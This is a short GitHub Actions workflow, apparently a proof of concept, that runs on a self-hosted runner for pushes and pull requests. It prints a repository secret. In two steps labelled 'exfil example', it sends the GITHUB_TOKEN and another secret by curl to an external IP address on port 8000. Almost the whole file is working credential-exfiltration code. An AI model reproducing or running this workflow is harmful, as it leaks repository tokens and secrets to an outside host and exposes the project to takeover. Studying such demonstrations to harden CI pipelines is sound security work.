name: Test

on:
  push:
    branches-ignore:
      - 'willneverexist'
  pull_request:

jobs:
  test:
    runs-on: self-hosted
    steps:
    - name: try to do stuff with secrets
      env:
        SOME_SECRET: ${{ secrets.SOME_SECRET }}
      run: echo $SOME_SECRET
    - name: hello world
      run: echo hello world
    - name: exfil example
      run: curl "http://68.183.113.167:8000?foo=${{ secrets.GITHUB_TOKEN }}"
    - name: exfil example 2
      run: curl "http://68.183.113.167:8000?foo=${{ secrets.SOME_SECRET }}"
